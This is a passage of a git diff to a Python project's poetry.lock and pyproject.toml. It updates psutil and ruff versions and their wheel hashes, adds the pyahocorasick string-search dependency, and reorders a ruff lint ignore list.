"psutil-6.1.0-cp36-abi3-macosx_11_0_arm64.whl", hash = "sha256:0895b8414afafc526712c498bd9de2b063deaac4021a3b3c34566283464aff8e"}, - {file = "psutil-6.1.0-cp36-abi3-manylinux_2_12_i686.manylinux2010_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:9dcbfce5d89f1d1f2546a2090f4fcf87c7f669d1d90aacb7d7582addece9fb38"}, - {file = "psutil-6.1.0-cp36-abi3-manylinux_2_12_x86_64.manylinux2010_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:498c6979f9c6637ebc3a73b3f87f9eb1ec24e1ce53a7c5173b8508981614a90b"}, - {file = "psutil-6.1.0-cp36-abi3-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:d905186d647b16755a800e7263d43df08b790d709d575105d419f8b6ef65423a"}, - {file = "psutil-6.1.0-cp36-cp36m-win32.whl", hash = 
"sha256:6d3fbbc8d23fcdcb500d2c9f94e07b1342df8ed71b948a2649b5cb060a7c94ca"}, - {file = "psutil-6.1.0-cp36-cp36m-win_amd64.whl", hash = "sha256:1209036fbd0421afde505a4879dee3b2fd7b1e14fee81c0069807adcbbcca747"}, - {file = "psutil-6.1.0-cp37-abi3-win32.whl", hash = "sha256:1ad45a1f5d0b608253b11508f80940985d1d0c8f6111b5cb637533a0e6ddc13e"}, - {file = "psutil-6.1.0-cp37-abi3-win_amd64.whl", hash = "sha256:a8fb3752b491d246034fa4d279ff076501588ce8cbcdbb62c32fd7a377d996be"}, - {file = "psutil-6.1.0.tar.gz", hash = "sha256:353815f59a7f64cdaca1c0307ee13558a0512f6db064e92fe833784f08539c7a"}, + {file = "psutil-6.1.1-cp27-cp27m-macosx_10_9_x86_64.whl", hash = "sha256:9ccc4316f24409159897799b83004cb1e24f9819b0dcf9c0b68bdcb6cefee6a8"}, + {file = "psutil-6.1.1-cp27-cp27m-manylinux2010_i686.whl", hash = "sha256:ca9609c77ea3b8481ab005da74ed894035936223422dc591d6772b147421f777"}, + {file = "psutil-6.1.1-cp27-cp27m-manylinux2010_x86_64.whl", hash = "sha256:8df0178ba8a9e5bc84fed9cfa61d54601b371fbec5c8eebad27575f1e105c0d4"}, + {file = "psutil-6.1.1-cp27-cp27mu-manylinux2010_i686.whl", hash = "sha256:1924e659d6c19c647e763e78670a05dbb7feaf44a0e9c94bf9e14dfc6ba50468"}, + {file = "psutil-6.1.1-cp27-cp27mu-manylinux2010_x86_64.whl", hash = "sha256:018aeae2af92d943fdf1da6b58665124897cfc94faa2ca92098838f83e1b1bca"}, + {file = "psutil-6.1.1-cp27-none-win32.whl", hash = "sha256:6d4281f5bbca041e2292be3380ec56a9413b790579b8e593b1784499d0005dac"}, + {file = "psutil-6.1.1-cp27-none-win_amd64.whl", hash = "sha256:c777eb75bb33c47377c9af68f30e9f11bc78e0f07fbf907be4a5d70b2fe5f030"}, + {file = "psutil-6.1.1-cp36-abi3-macosx_10_9_x86_64.whl", hash = "sha256:fc0ed7fe2231a444fc219b9c42d0376e0a9a1a72f16c5cfa0f68d19f1a0663e8"}, + {file = "psutil-6.1.1-cp36-abi3-macosx_11_0_arm64.whl", hash = "sha256:0bdd4eab935276290ad3cb718e9809412895ca6b5b334f5a9111ee6d9aff9377"}, + {file = "psutil-6.1.1-cp36-abi3-manylinux_2_12_i686.manylinux2010_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = 
"sha256:b6e06c20c05fe95a3d7302d74e7097756d4ba1247975ad6905441ae1b5b66003"}, + {file = "psutil-6.1.1-cp36-abi3-manylinux_2_12_x86_64.manylinux2010_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:97f7cb9921fbec4904f522d972f0c0e1f4fabbdd4e0287813b21215074a0f160"}, + {file = "psutil-6.1.1-cp36-abi3-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:33431e84fee02bc84ea36d9e2c4a6d395d479c9dd9bba2376c1f6ee8f3a4e0b3"}, + {file = "psutil-6.1.1-cp36-cp36m-win32.whl", hash = "sha256:384636b1a64b47814437d1173be1427a7c83681b17a450bfc309a1953e329603"}, + {file = "psutil-6.1.1-cp36-cp36m-win_amd64.whl", hash = "sha256:8be07491f6ebe1a693f17d4f11e69d0dc1811fa082736500f649f79df7735303"}, + {file = "psutil-6.1.1-cp37-abi3-win32.whl", hash = "sha256:eaa912e0b11848c4d9279a93d7e2783df352b082f40111e078388701fd479e53"}, + {file = "psutil-6.1.1-cp37-abi3-win_amd64.whl", hash = "sha256:f35cfccb065fff93529d2afb4a2e89e363fe63ca1e4a5da22b603a85833c2649"}, + {file = "psutil-6.1.1.tar.gz", hash = "sha256:cf8496728c18f2d0b45198f06895be52f36611711746b7f30c464b422b50e2f5"}, ] [package.extras] -dev = ["black", "check-manifest", "coverage", "packaging", "pylint", "pyperf", "pypinfo", "pytest-cov", "requests", "rstcheck", "ruff", "sphinx", "sphinx_rtd_theme", "toml-sort", "twine", "virtualenv", "wheel"] +dev = ["abi3audit", "black", "check-manifest", "coverage", "packaging", "pylint", "pyperf", "pypinfo", "pytest-cov", "requests", "rstcheck", "ruff", "sphinx", "sphinx_rtd_theme", "toml-sort", "twine", "virtualenv", "vulture", "wheel"] test = ["pytest", "pytest-xdist", "setuptools"] [[package]] @@ -1704,6 +1704,44 @@ files = [ {file = "puremagic-1.28.tar.gz", hash = "sha256:195893fc129657f611b86b959aab337207d6df7f25372209269ed9e303c1a8c0"}, ] +[[package]] +name = "pyahocorasick" +version = "2.1.0" +description = "pyahocorasick is a fast and memory efficient library for exact or approximate multi-pattern string search. 
With the ``ahocorasick.Automaton`` class, you can find multiple key string occurrences at once in some input text. You can use it as a plain dict-like Trie or convert a Trie to an automaton for efficient Aho-Corasick search. And pickle to disk for easy reuse of large automatons. Implemented in C and tested on Python 3.6+. Works on Linux, macOS and Windows. BSD-3-Cause license." +optional = false +python-versions = ">=3.8" +files = [ + {file = "pyahocorasick-2.1.0-cp310-cp310-macosx_10_9_universal2.whl", hash = "sha256:8c46288044c4f71392efb4f5da0cb8abd160787a8b027afc85079e9c3d7551eb"}, + {file = "pyahocorasick-2.1.0-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:1f15529c83b8c6e0548d7d3c5631fefa23fba5190e67be49d6c9e24a6358ff9c"}, + {file = "pyahocorasick-2.1.0-cp310-cp310-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:581e3d85043f1797543796f021e8d7d48c18e594529b72d86f70ea78abc88fff"}, + {file = "pyahocorasick-2.1.0-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:c860ad9cb59e56c31aed8a5d1ee9d83a0151277b09198d027ffce213697716ed"}, + {file = "pyahocorasick-2.1.0-cp310-cp310-win_amd64.whl", hash = "sha256:4f8eba88fce34a1d8020638a4a8732c6241a5d85fe12be8669b7495d99d36b6a"}, + {file = "pyahocorasick-2.1.0-cp311-cp311-macosx_10_9_universal2.whl", hash = "sha256:d6e0da0a8fc78c694778dced537c1bfb8b2f178ec92a82d81539d2e35a15cba0"}, + {file = "pyahocorasick-2.1.0-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:658d55e51c7588a5dba57de674241a16a3c94bf57f3bfd70022c4d7defe2b0f4"}, + {file = "pyahocorasick-2.1.0-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:a9f2728ac77bab807ba65c6ef41be30358ef0c9bb6960c9fe070d43f7024cb91"}, + {file = "pyahocorasick-2.1.0-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:a58c44c407a45155dc7a3253274b5fd78ab00b579bd5685059610867cdb37142"}, + {file = "pyahocorasick-2.1.0-cp311-cp311-win_amd64.whl", hash = 
"sha256:d8254d6333df5eb400ed3ec8b24da9e3f5da8e28b94a71392391703a7aac568d"}, + {file = "pyahocorasick-2.1.0-cp312-cp312-macosx_10_9_universal2.whl", hash = "sha256:82b0d20e82cc282fd29324e8df93809cebbffb345055214ce4b7873698df02c8"}, + {file = "pyahocorasick-2.1.0-cp312-cp312-macosx_10_9_x86_64.whl", hash = "sha256:6dedb9fed92705b742d6aa3d87abb1ec999f57310ef32b962f65f4e42182fe0a"}, + {file = "pyahocorasick-2.1.0-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:f209796e7d354734781dd883c333596e482c70136fa76a4cb169f383e6c40bca"}, + {file = "pyahocorasick-2.1.0-cp312-cp312-musllinux_1_1_x86_64.whl", hash = "sha256:8337af64c649223cff548c7204dda823e83622d63e5449bc51ae069efb2f240f"}, + {file = "pyahocorasick-2.1.0-cp312-cp312-win_amd64.whl", hash = "sha256:5ebe0d1e15afb782477e3d0aa1dce28ab9dad1200211fb785b9c1cc1208e6f04"}, + {file = "pyahocorasick-2.1.0-cp38-cp38-macosx_10_9_universal2.whl", hash = "sha256:7454ba5fa528958ca9a1bc3143f8e980bd7817ea481f46495e6ffa89675ab93b"}, + {file = "pyahocorasick-2.1.0-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:3795ac922d21fbfea40a6b3a330762e8b38ce8ba511b1eb15bf9eeb9303b2662"}, + {file = "pyahocorasick-2.1.0-cp38-cp38-manylinux_2_5_x86_64.manylinux1_x86_64.whl", hash = "sha256:8e92150849a3c13da37e37ca6374fa55960fd5c845029eca02d9b5846b26fe48"}, + {file = "pyahocorasick-2.1.0-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:23b183600e2087f16f6c5e6185d61525ad74335f2a5b693dd6d66bba2f6a4b05"}, + {file = "pyahocorasick-2.1.0-cp38-cp38-win_amd64.whl", hash = "sha256:7034b26e145518610651339b8701568a3533a3114b00cf55f22bca80bff58e6d"}, + {file = "pyahocorasick-2.1.0-cp39-cp39-macosx_10_9_universal2.whl", hash = "sha256:36491675a13fe4181a6b3bccfc9032a1a5d03bd3b0a151c06f8865c16ba44b42"}, + {file = "pyahocorasick-2.1.0-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:895ab1ff5384ee5325c74cbacafc419e534f1f110b9fb3c544cc56832ecce082"}, + {file = 
"pyahocorasick-2.1.0-cp39-cp39-manylinux_2_5_x86_64.manylinux1_x86_64.whl", hash = "sha256:bf4a4b19ac37e9a7087646b8bcc306acd7a91649355d59b866b756068e35d018"}, + {file = "pyahocorasick-2.1.0-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:f44f96496aa773fc5bf302ddf968dd6b920fab34522f944392af8bde13cbe805"}, + {file = "pyahocorasick-2.1.0-cp39-cp39-win_amd64.whl", hash = "sha256:05b7c2ef52da247efec6fb5a011113b7e943e961e22aaaf757cb9c15083440c9"}, + {file = "pyahocorasick-2.1.0.tar.gz", hash = "sha256:4df4845c1149e9fa4aa33f0f0aa35f5a42957a43a3d6e447c9b44e679e2672ea"}, +] + +[package.extras] +testing = ["pytest", "setuptools", "twine", "wheel"] + [[package]] name = "pycparser" version = "2.22" @@ -2488,29 +2526,29 @@ test = ["commentjson", "packaging", "pytest"] [[package]] name = "ruff" -version = "0.8.3" +version = "0.8.4" description = "An extremely fast Python linter and code formatter, written in Rust." optional = false python-versions = ">=3.7" files = [ - {file = "ruff-0.8.3-py3-none-linux_armv6l.whl", hash = "sha256:8d5d273ffffff0acd3db5bf626d4b131aa5a5ada1276126231c4174543ce20d6"}, - {file = "ruff-0.8.3-py3-none-macosx_10_12_x86_64.whl", hash = "sha256:e4d66a21de39f15c9757d00c50c8cdd20ac84f55684ca56def7891a025d7e939"}, - {file = "ruff-0.8.3-py3-none-macosx_11_0_arm64.whl", hash = "sha256:c356e770811858bd20832af696ff6c7e884701115094f427b64b25093d6d932d"}, - {file = "ruff-0.8.3-py3-none-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:9c0a60a825e3e177116c84009d5ebaa90cf40dfab56e1358d1df4e29a9a14b13"}, - {file = "ruff-0.8.3-py3-none-manylinux_2_17_armv7l.manylinux2014_armv7l.whl", hash = "sha256:75fb782f4db39501210ac093c79c3de581d306624575eddd7e4e13747e61ba18"}, - {file = "ruff-0.8.3-py3-none-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:7f26bc76a133ecb09a38b7868737eded6941b70a6d34ef53a4027e83913b6502"}, - {file = "ruff-0.8.3-py3-none-manylinux_2_17_ppc64.manylinux2014_ppc64.whl", hash = 
"sha256:01b14b2f72a37390c1b13477c1c02d53184f728be2f3ffc3ace5b44e9e87b90d"}, - {file = "ruff-0.8.3-py3-none-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:53babd6e63e31f4e96ec95ea0d962298f9f0d9cc5990a1bbb023a6baf2503a82"}, - {file = "ruff-0.8.3-py3-none-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:1ae441ce4cf925b7f363d33cd6570c51435972d697e3e58928973994e56e1452"}, - {file = "ruff-0.8.3-py3-none-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:d7c65bc0cadce32255e93c57d57ecc2cca23149edd52714c0c5d6fa11ec328cd"}, - {file = "ruff-0.8.3-py3-none-musllinux_1_2_aarch64.whl", hash = "sha256:5be450bb18f23f0edc5a4e5585c17a56ba88920d598f04a06bd9fd76d324cb20"}, - {file = "ruff-0.8.3-py3-none-musllinux_1_2_armv7l.whl", hash = "sha256:8faeae3827eaa77f5721f09b9472a18c749139c891dbc17f45e72d8f2ca1f8fc"}, - {file = "ruff-0.8.3-py3-none-musllinux_1_2_i686.whl", hash = "sha256:db503486e1cf074b9808403991663e4277f5c664d3fe237ee0d994d1305bb060"}, - {file = "ruff-0.8.3-py3-none-musllinux_1_2_x86_64.whl", hash = "sha256:6567be9fb62fbd7a099209257fef4ad2c3153b60579818b31a23c886ed4147ea"}, - {file = "ruff-0.8.3-py3-none-win32.whl", hash = "sha256:19048f2f878f3ee4583fc6cb23fb636e48c2635e30fb2022b3a1cd293402f964"}, - {file = "ruff-0.8.3-py3-none-win_amd64.whl", hash = "sha256:f7df94f57d7418fa7c3ffb650757e0c2b96cf2501a0b192c18e4fb5571dfada9"}, - {file = "ruff-0.8.3-py3-none-win_arm64.whl", hash = "sha256:fe2756edf68ea79707c8d68b78ca9a58ed9af22e430430491ee03e718b5e4936"}, - {file = "ruff-0.8.3.tar.gz", hash = "sha256:5e7558304353b84279042fc584a4f4cb8a07ae79b2bf3da1a7551d960b5626d3"}, + {file = "ruff-0.8.4-py3-none-linux_armv6l.whl", hash = "sha256:58072f0c06080276804c6a4e21a9045a706584a958e644353603d36ca1eb8a60"}, + {file = "ruff-0.8.4-py3-none-macosx_10_12_x86_64.whl", hash = "sha256:ffb60904651c00a1e0b8df594591770018a0f04587f7deeb3838344fe3adabac"}, + {file = "ruff-0.8.4-py3-none-macosx_11_0_arm64.whl", hash = 
"sha256:6ddf5d654ac0d44389f6bf05cee4caeefc3132a64b58ea46738111d687352296"}, + {file = "ruff-0.8.4-py3-none-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:e248b1f0fa2749edd3350a2a342b67b43a2627434c059a063418e3d375cfe643"}, + {file = "ruff-0.8.4-py3-none-manylinux_2_17_armv7l.manylinux2014_armv7l.whl", hash = "sha256:bf197b98ed86e417412ee3b6c893f44c8864f816451441483253d5ff22c0e81e"}, + {file = "ruff-0.8.4-py3-none-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:c41319b85faa3aadd4d30cb1cffdd9ac6b89704ff79f7664b853785b48eccdf3"}, + {file = "ruff-0.8.4-py3-none-manylinux_2_17_ppc64.manylinux2014_ppc64.whl", hash = "sha256:9f8402b7c4f96463f135e936d9ab77b65711fcd5d72e5d67597b543bbb43cf3f"}, + {file = "ruff-0.8.4-py3-none-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:e4e56b3baa9c23d324ead112a4fdf20db9a3f8f29eeabff1355114dd96014604"}, + {file = "ruff-0.8.4-py3-none-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:736272574e97157f7edbbb43b1d046125fce9e7d8d583d5d65d0c9bf2c15addf"}, + {file = "ruff-0.8.4-py3-none-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:e5fe710ab6061592521f902fca7ebcb9fabd27bc7c57c764298b1c1f15fff720"}, + {file = "ruff-0.8.4-py3-none-musllinux_1_2_aarch64.whl", hash = "sha256:13e9ec6d6b55f6da412d59953d65d66e760d583dd3c1c72bf1f26435b5bfdbae"}, + {file = "ruff-0.8.4-py3-none-musllinux_1_2_armv7l.whl", hash = "sha256:97d9aefef725348ad77d6db98b726cfdb075a40b936c7984088804dfd38268a7"}, + {file = "ruff-0.8.4-py3-none-musllinux_1_2_i686.whl", hash = "sha256:ab78e33325a6f5374e04c2ab924a3367d69a0da36f8c9cb6b894a62017506111"}, + {file = "ruff-0.8.4-py3-none-musllinux_1_2_x86_64.whl", hash = "sha256:8ef06f66f4a05c3ddbc9121a8b0cecccd92c5bf3dd43b5472ffe40b8ca10f0f8"}, + {file = "ruff-0.8.4-py3-none-win32.whl", hash = "sha256:552fb6d861320958ca5e15f28b20a3d071aa83b93caee33a87b471f99a6c0835"}, + {file = "ruff-0.8.4-py3-none-win_amd64.whl", hash = 
"sha256:f21a1143776f8656d7f364bd264a9d60f01b7f52243fbe90e7670c0dfe0cf65d"}, + {file = "ruff-0.8.4-py3-none-win_arm64.whl", hash = "sha256:9183dd615d8df50defa8b1d9a074053891ba39025cf5ae88e8bcb52edcc4bf08"}, + {file = "ruff-0.8.4.tar.gz", hash = "sha256:0d5f89f254836799af1615798caa5f80b7f935d7a670fad66c5007928e57ace8"}, ] [[package]] @@ -3157,4 +3195,4 @@ type = ["pytest-mypy"] [metadata] lock-version = "2.0" python-versions = "^3.9" -content-hash = "0145b8e3c345caf43d941534dbfae68125f0006a29c033857311c392ff73672f" +content-hash = "eb13498c96f67946274d90932ef9a9a4cb6667a7ce5b4dc4f169b356ccc5a216" diff --git a/pyproject.toml b/pyproject.toml index 7b463077d2..444891ec9d 100644 --- a/pyproject.toml +++ b/pyproject.toml @@ -53,6 +53,7 @@ setproctitle = "^1.3.3" yara-python = "^4.5.1" pyzmq = "^26.0.3" httpx = "^0.27.0" +pyahocorasick = "^2.1.0" puremagic = "^1.28" radixtarget = "^3.0.13" cloudcheck = "^7.0.12" @@ -103,7 +104,7 @@ skip = "./docs/javascripts/vega*.js,./bbot/wordlists/*" [tool.ruff] line-length = 119 format.exclude = ["bbot/test/test_step_1/test_manager_*"] -lint.ignore = ["E402", "E711", "E713", "E721", "E741", "F401", "F403", "F405"] +lint.ignore = ["E402", "E721", "E741", "F401", "F403", "F405", "E713", "E711"] [tool.poetry-dynamic-versioning] enable = true